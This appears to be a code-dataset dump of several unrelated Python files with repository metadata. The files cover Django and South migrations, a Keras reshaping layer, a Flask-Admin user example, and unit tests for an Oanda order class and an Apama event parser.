validators=[django.core.validators.MinValueValidator(0)],
verbose_name="total",
),
),
(
"invoiced_on",
models.DateField(blank=True, null=True, verbose_name="invoiced on"),
),
(
"due_on",
models.DateField(blank=True, null=True, verbose_name="due on"),
),
(
"closed_on",
models.DateField(
blank=True,
help_text="Payment date for paid invoices, date of replacement or cancellation otherwise.",
null=True,
verbose_name="closed on",
),
),
("title", models.CharField(max_length=200, verbose_name="title")),
(
"description",
models.TextField(blank=True, verbose_name="description"),
),
(
"created_at",
models.DateTimeField(
default=django.utils.timezone.now, verbose_name="created at"
),
),
(
"status",
models.PositiveIntegerField(
choices=[
(10, "In preparation"),
(20, "Sent"),
(30, "Reminded"),
(40, "Paid"),
(50, "Canceled"),
(60, "Replaced"),
],
default=10,
verbose_name="status",
),
),
(
"type",
models.CharField(
choices=[
("fixed", "Fixed amount"),
("down-payment", "Down payment"),
("services", "Services"),
("credit", "Credit"),
],
max_length=20,
verbose_name="type",
),
),
(
"down_payment_total",
models.DecimalField(
decimal_places=2,
default=Decimal("0.00"),
max_digits=10,
validators=[django.core.validators.MinValueValidator(0)],
verbose_name="down payment total",
),
),
("postal_address", models.TextField(verbose_name="postal address")),
("_code", models.IntegerField(verbose_name="code")),
(
"payment_notice",
models.TextField(
blank=True,
help_text="This fields' value is overridden when processing credit entries.",
verbose_name="payment notice",
),
),
(
"contact",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.SET_NULL,
to="contacts.Person",
verbose_name="contact",
),
),
(
"customer",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to="contacts.Organization",
verbose_name="customer",
),
),
(
"down_payment_applied_to",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.PROTECT,
related_name="down_payment_invoices",
to="invoices.Invoice",
verbose_name="down payment applied to",
),
),
(
"owned_by",
models.ForeignKey(
on_delete=django.db.models.deletion.PROTECT,
to=settings.AUTH_USER_MODEL,
verbose_name="contact person",
),
),
],
options={
"verbose_name": "invoice",
"verbose_name_plural": "invoices",
"ordering": ("-id",),
},
)
]
| 36.694581 | 115 | 0.369983 | 473 | 7,449 | 5.674419 | 0.310782 | 0.098361 | 0.044709 | 0.040984 | 0.358048 | 0.348361 | 0.348361 | 0.328614 | 0.328614 | 0.295082 | 0 | 0.02109 | 0.541683 | 7,449 | 202 | 116 | 36.876238 | 0.765085 | 0.006041 | 0 | 0.402062 | 1 | 0 | 0.123075 | 0.008781 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.030928 | 0 | 0.051546 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78733d61064ebbc703ac7b9326491f407ee90916 | 4,568 | py | Python | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | content_interactions_stats/migrations/0001_initial.py | aaboffill/django-content-interactions | 8ea881e46cc6d5c375542939bb69d2980efdec23 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Stats'
db.create_table(u'content_interactions_stats_stats', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('likes', self.gf('django.db.models.fields.IntegerField')(default=0)),
('ratings', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_5_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_4_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_3_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_2_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating_1_count', self.gf('django.db.models.fields.IntegerField')(default=0)),
('rating', self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=2, decimal_places=1)),
('favorite_marks', self.gf('django.db.models.fields.IntegerField')(default=0)),
('shares', self.gf('django.db.models.fields.IntegerField')(default=0)),
('denounces', self.gf('django.db.models.fields.IntegerField')(default=0)),
('visits', self.gf('django.db.models.fields.IntegerField')(default=0)),
('content_type', self.gf('django.db.models.fields.related.ForeignKey')(related_name='content_type_set_for_stats', to=orm['contenttypes.ContentType'])),
('object_pk', self.gf('django.db.models.fields.IntegerField')()),
))
db.send_create_signal(u'content_interactions_stats', ['Stats'])
# Adding unique constraint on 'Stats', fields ['content_type', 'object_pk']
db.create_unique(u'content_interactions_stats_stats', ['content_type_id', 'object_pk'])
def backwards(self, orm):
# Removing unique constraint on 'Stats', fields ['content_type', 'object_pk']
db.delete_unique(u'content_interactions_stats_stats', ['content_type_id', 'object_pk'])
# Deleting model 'Stats'
db.delete_table(u'content_interactions_stats_stats')
models = {
u'content_interactions_stats.stats': {
'Meta': {'unique_together': "(('content_type', 'object_pk'),)", 'object_name': 'Stats'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_stats'", 'to': u"orm['contenttypes.ContentType']"}),
'denounces': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'favorite_marks': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'likes': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'object_pk': ('django.db.models.fields.IntegerField', [], {}),
'rating': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '2', 'decimal_places': '1'}),
'rating_1_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_2_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_3_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_4_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'rating_5_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'ratings': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'shares': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'visits': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
}
}
complete_apps = ['content_interactions_stats'] | 64.338028 | 171 | 0.619527 | 521 | 4,568 | 5.253359 | 0.166987 | 0.102302 | 0.173913 | 0.248447 | 0.758129 | 0.724516 | 0.692364 | 0.649251 | 0.516989 | 0.411765 | 0 | 0.013018 | 0.176007 | 4,568 | 71 | 172 | 64.338028 | 0.714134 | 0.047067 | 0 | 0.035714 | 0 | 0 | 0.531739 | 0.364305 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.071429 | 0 | 0.160714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
787ee1d9853b359fa3bd7f67f45bcdbbd1b42170 | 355 | py | Python | dnevnik/__init__.py | IvanProgramming/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 19 | 2020-11-21T15:29:11.000Z | 2022-03-18T16:16:03.000Z | dnevnik/__init__.py | RedGuys/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 1 | 2020-12-03T22:25:15.000Z | 2020-12-29T11:23:28.000Z | dnevnik/__init__.py | RedGuys/dnevnik_mos_ru | 303b119115b3b88b330e2b7cc512c7a447ce5da0 | [
"MIT"
] | 9 | 2020-12-09T13:02:24.000Z | 2022-02-07T18:19:32.000Z | __version__ = "2.3.0"
from .school import School
from .class_unit import ClassUnit
from .group import Group
from .teacher import Teacher
from .student_profile import StudentProfile
from .client import Client
from .academic_years import AcademicYear
from .auth_providers import *
from .exceptions import *
from .base_auth_provider import BaseAuthProvider
| 27.307692 | 48 | 0.828169 | 48 | 355 | 5.916667 | 0.520833 | 0.070423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009646 | 0.123944 | 355 | 12 | 49 | 29.583333 | 0.903537 | 0 | 0 | 0 | 0 | 0 | 0.014085 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.909091 | 0 | 0.909091 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7883b4489468fd1015af7a4b0a88ce8710f26385 | 473 | py | Python | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | 1 | 2019-05-04T01:25:43.000Z | 2019-05-04T01:25:43.000Z | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | null | null | null | test_two/test.py | greatfirsty/hellopython | f12aacf36b8f208d6c5622ffd6b4c1927f37b45a | [
"Apache-2.0"
] | null | null | null | import unittest
class My_test(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
@unittest.skip('直接跳过测试')
def test_skip(self):
print('test skip!')
@unittest.skipIf(3>2,'当条件为TRUE,跳过测试')
def test_skip_if(self):
print('the condition if ,test skip')
@unittest.skipUnless(3>2,'当条件为TRUE,执行测试')
def test_skip_unless(self):
print('但条件为真时,执行测试')
if __name__ == '__main__':
unittest.main() | 24.894737 | 45 | 0.630021 | 61 | 473 | 4.655738 | 0.459016 | 0.140845 | 0.116197 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.230444 | 473 | 19 | 46 | 24.894737 | 0.769231 | 0 | 0 | 0.117647 | 0 | 0 | 0.185654 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0.117647 | 0.058824 | 0 | 0.411765 | 0.176471 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
78a67ba5096ebf53d533be3eb20497845483335a | 3,225 | py | Python | deep_qa/layers/backend/collapse_to_batch.py | richarajpal/deep_qa | d918335a1bed71b9cfccf1d5743321cee9c61952 | [
"Apache-2.0"
] | 459 | 2017-02-08T13:40:17.000Z | 2021-12-12T12:57:48.000Z | deep_qa/layers/backend/collapse_to_batch.py | nelson-liu/deep_qa | 00d36306759cb1c232489f68844371fb727ce2c8 | [
"Apache-2.0"
] | 176 | 2017-01-26T01:19:41.000Z | 2018-04-22T19:16:01.000Z | deep_qa/layers/backend/collapse_to_batch.py | nelson-liu/deep_qa | 00d36306759cb1c232489f68844371fb727ce2c8 | [
"Apache-2.0"
] | 154 | 2017-01-26T01:00:30.000Z | 2021-02-05T10:44:42.000Z | from keras import backend as K
from overrides import overrides
from ..masked_layer import MaskedLayer
class CollapseToBatch(MaskedLayer):
"""
Reshapes a higher order tensor, taking the first ``num_to_collapse`` dimensions after the batch
dimension and folding them into the batch dimension. For example, a tensor of shape (2, 4, 5,
3), collapsed with ``num_to_collapse = 2``, would become a tensor of shape (40, 3). We perform
identical computation on the input mask, if there is one.
This is essentially what Keras' ``TimeDistributed`` layer does (and then undoes) to apply a
layer to a higher-order tensor, and that's the intended use for this layer. However,
``TimeDistributed`` cannot handle distributing across dimensions with unknown lengths at graph
compilation time. This layer works even in that case. So, if your actual tensor shape at
graph compilation time looks like (None, None, None, 3), or (None, 4, None, 3), you can still
use this layer (and :class:`~deep_qa.layers.backend.expand_from_batch.ExpandFromBatch`) to get
the same result as ``TimeDistributed``. If your shapes are fully known at graph compilation
time, just use ``TimeDistributed``, as it's a nicer API for the same functionality.
Inputs:
- tensor with ``ndim >= 3``
Output:
- tensor with ``ndim = input_ndim - num_to_collapse``, with the removed dimensions folded
into the first (batch-size) dimension
Parameters
----------
num_to_collapse: int
The number of dimensions to fold into the batch size.
"""
def __init__(self, num_to_collapse: int, **kwargs):
self.num_to_collapse = num_to_collapse
super(CollapseToBatch, self).__init__(**kwargs)
@overrides
def call(self, inputs, mask=None):
return self.__collapse_tensor(inputs)
@overrides
def compute_mask(self, inputs, mask=None):
# pylint: disable=unused-argument
if mask is None:
return None
return self.__collapse_tensor(mask)
@overrides
def compute_output_shape(self, input_shape):
return (None,) + input_shape[1 + self.num_to_collapse:]
@overrides
def get_config(self):
base_config = super(CollapseToBatch, self).get_config()
config = {'num_to_collapse': self.num_to_collapse}
config.update(base_config)
return config
def __collapse_tensor(self, tensor):
# If we were to call K.int_shape(inputs), we would get something back that has None in it
# (other than the batch dimension), because the shape is not fully known at graph
# compilation time. We can't do a reshape with more than one unknown dimension, which is
# why we're doing this whole layer in the first place instead of just using
# TimeDistributed. tf.reshape will let us pass in a tensor that has the shape, instead of
# just some ints. So we can use tf.shape(tensor) to get the actual runtime shape of the
# tensor _as a tensor_, which we then pass to tf.reshape().
new_shape = K.concatenate([[-1], K.shape(tensor)[1 + self.num_to_collapse:]], 0)
return K.reshape(tensor, new_shape)
| 45.422535 | 99 | 0.690543 | 466 | 3,225 | 4.654506 | 0.356223 | 0.025357 | 0.065929 | 0.039189 | 0.071923 | 0.029507 | 0 | 0 | 0 | 0 | 0 | 0.006439 | 0.229457 | 3,225 | 70 | 100 | 46.071429 | 0.866398 | 0.608372 | 0 | 0.148148 | 0 | 0 | 0.012931 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.222222 | false | 0 | 0.111111 | 0.074074 | 0.592593 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 2 |
78adbe2a86608537edf115c5f7387eaafc400ee7 | 2,891 | py | Python | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | 2 | 2016-03-01T22:15:39.000Z | 2016-07-17T18:10:19.000Z | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | null | null | null | example/declarative/custom_form.py | wilsaj/flask-admin-old | aab2fe94e0641932ebd1c8f8dc500ba2daf5731c | [
"MIT"
] | null | null | null | import sys
from flask import Flask, redirect
from flask.ext import admin
from flask.ext.admin.datastore.sqlalchemy import SQLAlchemyDatastore
from sqlalchemy import create_engine
from sqlalchemy.orm import scoped_session, sessionmaker
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy import Boolean, Column, Integer, Text, String, Float, Time
from sqlalchemy.orm import synonym
from werkzeug import check_password_hash, generate_password_hash
from wtforms import Form, validators
from wtforms.fields import BooleanField, TextField, PasswordField
Base = declarative_base()
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
username = Column(String(80), unique=True)
_password_hash = Column('password', String(80), nullable=False)
is_active = Column(Boolean, default=True)
def __init__(self, username="", password="", is_active=True):
self.username = username
self.password = password
self.is_active = is_active
def check_password(self, password):
return check_password_hash(self.pw_hash, password)
@property
def password(self):
return self._password_hash
@password.setter
def password(self, password):
self._password_hash = generate_password_hash(password)
password = synonym('_password_hash', descriptor=password)
def __repr__(self):
return self.username
__mapper_args__ = {
'order_by': username
}
class UserForm(Form):
"""
Form for creating or editting User object (via the admin). Define
any handling of fields here. This form class also has precedence
when rendering forms to a webpage, so the model-generated fields
will come after it.
"""
username = TextField(u'User name',
[validators.required(), validators.length(max=80)])
password = PasswordField('Change Password',
[validators.optional(),
validators.equal_to('confirm_password')])
confirm_password = PasswordField()
is_active = BooleanField(default=True)
def create_app(database_uri='sqlite://'):
app = Flask(__name__)
app.config['SECRET_KEY'] = 'not secure'
engine = create_engine(database_uri, convert_unicode=True)
db_session = scoped_session(sessionmaker(
autocommit=False, autoflush=False,
bind=engine))
datastore = SQLAlchemyDatastore(
(User,), db_session, model_forms={'User': UserForm})
admin_blueprint = admin.create_admin_blueprint(
datastore)
app.register_blueprint(admin_blueprint, url_prefix='/admin')
Base.metadata.create_all(bind=engine)
@app.route('/')
def go_to_admin():
return redirect('/admin')
return app
if __name__ == '__main__':
app = create_app('sqlite:///simple.db')
app.run(debug=True)
| 31.086022 | 76 | 0.697682 | 337 | 2,891 | 5.744807 | 0.391691 | 0.049587 | 0.030992 | 0.02376 | 0.033058 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00262 | 0.207887 | 2,891 | 92 | 77 | 31.423913 | 0.842795 | 0.074369 | 0 | 0 | 0 | 0 | 0.055514 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.107692 | false | 0.246154 | 0.184615 | 0.061538 | 0.569231 | 0.030769 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 2 |
78afe69271dcc19c401da576fa437b2d4d8ccb57 | 2,351 | py | Python | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 81 | 2015-03-18T23:02:33.000Z | 2021-07-13T15:00:14.000Z | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 32 | 2015-04-18T22:04:00.000Z | 2019-02-28T00:58:39.000Z | pyoanda/tests/test_order.py | toloco/pyoanda | 26b3f28a89d07c5c20d2a645884505387f1daae8 | [
"MIT"
] | 32 | 2015-04-06T16:42:07.000Z | 2018-02-13T19:06:19.000Z | from datetime import datetime
try:
import unittest2 as unittest
except ImportError:
import unittest
from ..order import Order
class OrderClassTest(unittest.TestCase):
def fail(self, order):
with self.assertRaises(TypeError):
assert order.check()
def test_creation(self):
order = Order(
instrument="GBP_EUR",
units=11,
side="buy",
type="market"
)
assert order.check()
def test_creation_bad_param(self):
order = Order(
instrument="GBP_EUR",
units=11,
side="buy",
type="market",
bad="param"
)
self.fail(order)
def test_creation_bad_units(self):
order = Order(
instrument="GBP_EUR",
units="bad",
side="buy",
type="market"
)
self.fail(order)
def test_creation_bad_side(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="bad",
type="market"
)
self.fail(order)
def test_creation_bad_type(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="bad"
)
self.fail(order)
def test_creation_with_type(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
expiry=datetime.now()
)
assert order.check()
def test_creation_with_type_error(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
)
self.fail(order)
def test_creation_bad_expiry(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price=10.0,
expiry="datetime.now()"
)
self.fail(order)
def test_creation_bad_price(self):
order = Order(
instrument="GBP_EUR",
units=1,
side="sell",
type="limit",
price="10.0",
expiry=datetime.now()
)
assert order.check()
| 22.605769 | 44 | 0.482773 | 234 | 2,351 | 4.700855 | 0.183761 | 0.081818 | 0.122727 | 0.196364 | 0.78 | 0.769091 | 0.673636 | 0.557273 | 0.557273 | 0.446364 | 0 | 0.016547 | 0.408762 | 2,351 | 103 | 45 | 22.825243 | 0.77482 | 0 | 0 | 0.622222 | 0 | 0 | 0.071459 | 0 | 0 | 0 | 0 | 0 | 0.055556 | 1 | 0.111111 | false | 0 | 0.055556 | 0 | 0.177778 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78b18630fc1ece77e77833d5d3ab0f8dbb770586 | 7,972 | py | Python | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | 3 | 2017-03-03T22:14:51.000Z | 2021-02-03T03:01:03.000Z | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | null | null | null | tests/test_eventparser.py | DanskeBank/apamaeventparser | 40767140faa8bd5a4ae134162e0e0c10457786f7 | [
"MIT"
] | 1 | 2016-10-10T10:52:38.000Z | 2016-10-10T10:52:38.000Z | import unittest
from apamaeventparser.apamaevent import ApamaEvent
from apamaeventparser.eventparser import parse, _tokenize, _channel, _package_name, _event_name, _event_body, _sequence, _dictionary
class TestEvents(unittest.TestCase):
def test_no_event(self):
expected_event = None
parsed_event = parse('')
self.assertEqual(parsed_event, expected_event)
def test_simple_event(self):
expected_event = ApamaEvent(event_name='a')
parsed_event = parse('a()')
self.assertEqual(parsed_event, expected_event)
def test_package_one_level(self):
expected_event = ApamaEvent(package_name='heimdall', event_name='ragnarok')
parsed_event = parse('heimdall.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_package_two_levels(self):
expected_event = ApamaEvent(package_name='heimdall.horn', event_name='ragnarok')
parsed_event = parse('heimdall.horn.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_package_many_levels(self):
expected_event = ApamaEvent(package_name='heimdall.guard.rainbow.bridge.blow.horn', event_name='ragnarok')
parsed_event = parse('heimdall.guard.rainbow.bridge.blow.horn.ragnarok()')
self.assertEqual(parsed_event, expected_event)
def test_simple_fields(self):
expected_event = ApamaEvent(package_name='heimdall.horn',
event_name='ragnarok',
fields=['valhalla', 1, 3.14, 1.0e6, False, True])
parsed_event = parse('heimdall.horn.ragnarok("valhalla", 1, 3.14, 1.0e6, false, true)')
self.assertEqual(parsed_event, expected_event)
def test_channel(self):
expected_event = ApamaEvent(channel='channel',
package_name='heimdall.horn',
event_name='ragnarok',
fields=['valhalla', 1, 3.14, 1.0e6, False, True])
parsed_event = parse('"channel",heimdall.horn.ragnarok("valhalla", 1, 3.14, 1.0e6, false, true)')
self.assertEqual(parsed_event, expected_event)
def test_nested_event(self):
expected_event = ApamaEvent(channel='channel',
package_name='heimdall.horn',
event_name='ragnarok',
fields=[
ApamaEvent(package_name='rainbow.bridge',
event_name='breached',
fields=[True])])
parsed_event = parse('"channel",heimdall.horn.ragnarok(rainbow.bridge.breached(true))')
self.assertEqual(parsed_event, expected_event)
def test_readme_example(self):
expected_event = ApamaEvent(package_name='com.apama',
event_name='Event',
fields=['Field', 1.234, 7, False, ['a', 'b', 'c'], {'key': 'value'}])
parsed_event = parse('com.apama.Event("Field", 1.234, 7, false, ["a","b","c"], {"key": "value"})')
self.assertEqual(parsed_event, expected_event)
class TestEventParts(unittest.TestCase):
def test_channel(self):
expected_result = 'channel'
tokens = _tokenize('"channel",')
parsed_channel = _channel.parse(tokens)
self.assertEqual(parsed_channel, expected_result)
def test_package_name(self):
expected_result = 'heimdall.guard.rainbow.bridge.blow.horn'
tokens = _tokenize('heimdall.guard.rainbow.bridge.blow.horn.')
parsed_package = _package_name.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_name(self):
expected_result = 'ragnarok'
tokens = _tokenize('ragnarok')
parsed_package = _event_name.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_body_simple_types(self):
expected_result = ['valhalla', 1, 3.14, 1.0e6, True, False]
tokens = _tokenize('("valhalla", 1, 3.14, 1.0e6, true, false)')
parsed_package = _event_body.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_event_body_all_types(self):
expected_result = ['valhalla', 1, 3.14, 1.0e6, True, False, [1, 2, 3, 4],
{'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'}]
tokens = _tokenize('("valhalla", 1, 3.14, 1.0e6, true, false,[1,2,3,4],'
'{"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"})')
parsed_package = _event_body.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_string(self):
expected_result = ['a', 'b', 'c']
tokens = _tokenize('["a","b","c"]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_numbers(self):
expected_result = [1, 2, 3, 4]
tokens = _tokenize('[1,2,3,4]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_one_item_sequence(self):
expected_result = ['Thor']
tokens = _tokenize('["Thor"]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence(self):
expected_result = []
tokens = _tokenize('[]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_in_sequence(self):
expected_result = [[1, 2, 3], [4, 5, 6], [7, 8], [9]]
tokens = _tokenize('[[1,2,3],[4,5,6],[7,8],[9]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence_in_sequence(self):
expected_result = [[]]
tokens = _tokenize('[[]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_sequence_in_sequence_in_sequence(self):
# This is not a legal event type since sequences need to all be the same type, however it still parses...
expected_result = [1, 2, 3, ['a', 'b', 'c'], [['aa', 'bb'], ['cc', 'dd']]]
tokens = _tokenize('[1,2,3,["a","b","c"],[["aa","bb"],["cc","dd"]]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_sequence_in_sequence_in_sequence(self):
expected_result = [[[]]]
tokens = _tokenize('[[[]]]')
parsed_package = _sequence.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_empty_dictionary(self):
expected_result = {}
tokens = _tokenize('{}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_dictionary(self):
expected_result = {'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'}
tokens = _tokenize('{"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
def test_dictionary_in_dictionary(self):
expected_result = {'other': {},
'Weapons': {'Thor': 'Mjolner', 'Odin': 'Gungnir', 'Freja': 'Falkedragt'},
'Transportation': {'Odin': 'Sleipner', 'Thor': 'Goats'}}
tokens = _tokenize('{"other":{}, '
'"Weapons": {"Thor": "Mjolner", "Odin": "Gungnir", "Freja": "Falkedragt"}, '
'"Transportation": {"Odin": "Sleipner", "Thor": "Goats"}}')
parsed_package = _dictionary.parse(tokens)
self.assertEqual(parsed_package, expected_result)
| 46.348837 | 132 | 0.612017 | 859 | 7,972 | 5.413271 | 0.125728 | 0.096344 | 0.112903 | 0.089462 | 0.792473 | 0.764516 | 0.713978 | 0.679785 | 0.621935 | 0.583441 | 0 | 0.017794 | 0.25276 | 7,972 | 171 | 133 | 46.619883 | 0.7628 | 0.01292 | 0 | 0.342857 | 0 | 0.042857 | 0.175289 | 0.054786 | 0 | 0 | 0 | 0 | 0.178571 | 1 | 0.178571 | false | 0 | 0.021429 | 0 | 0.214286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
78c3a132c809348a8e01047019a81ba3d48477aa | 23,329 | py | Python | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 200 | 2017-03-19T15:15:14.000Z | 2022-02-04T21:11:48.000Z | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 17 | 2017-03-20T14:26:54.000Z | 2018-12-04T08:35:45.000Z | core/background.py | nkrios/PloitKit | 8fb4d7a84699917dbabcf358650c6a4e043c597f | [
"MIT"
] | 80 | 2017-03-20T14:06:36.000Z | 2022-01-09T10:18:43.000Z | #! /usr/bin/env python
__author__ = 'Rajesh Majumdar'
try:
from tkinter import *
import tkinter.scrolledtext as sctx
except:
from Tkinter import *
import ScrolledText as sctx
try:
import ttk
except ImportError:
